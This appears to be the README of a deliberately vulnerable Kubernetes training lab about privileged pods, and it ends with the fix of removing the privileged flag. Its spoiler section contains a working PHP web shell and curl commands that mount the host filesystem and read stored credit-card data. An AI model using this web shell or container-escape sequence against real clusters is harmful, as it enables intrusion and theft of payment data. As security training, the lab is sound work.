Privileged pod (AKA privileged) is one of the Security Context flags for a Pod or Container.
Privileged containers can do nearly everything a process on the host can do, and provide no isolation from other workloads. This kind of a setting should be avoided where possible.
Vulnerable application with RCE and privileged access.
-
Deployment -
k8s/PrivilegedPod/web/deployment.yamlThis
k8sdeployment contains the unsecured instructionprivileged: true -
Service -
k8s/PrivilegedPod/web/service.yaml
Payments processing microservice. Completely protected ;).
- Deployment -
k8s/PrivilegedPod/payment/deployment.yaml - Service -
k8s/PrivilegedPod/payment/service.yaml
Spoiler alert
Your target is to steal users credit cards. Cards data is located in payment microservice (which has no security issues). But web microservice has an RCE vulnerability (and has privileged). This allows us to access any data in the cluster, including cards data.
- Upload file
shell.php:<?php echo '<pre>'; var_dump(system($_GET['cmd'])); echo '</pre>'; ?>
- Create temporary directory for host file system
curl http://192.168.99.100/upload/fe84f884761716f9e641479e992c4c6f.php?cmd=mkdir%20/tmp/host - Mount host's file system (usually
sda1when Minikube is running on Mac //dev/vda1on Linux)curl http://192.168.99.100/upload/fe84f884761716f9e641479e992c4c6f.php?cmd=mount%20/dev/sda1%20/tmp/host - Find file
cards.jsonin hosts filesystemcurl http://192.168.99.100/upload/fe84f884761716f9e641479e992c4c6f.php?cmd=find%20/tmp/host%20-name%20"cards.json" - Get stored cards
curl http://192.168.99.100/upload/fe84f884761716f9e641479e992c4c6f.php?cmd=cat%20<👆>
To fix the problem you need to remove privileged flag from web/deployment.yaml. It will not help to protect web microservice but prevent steeling of credit cards from payment microservice.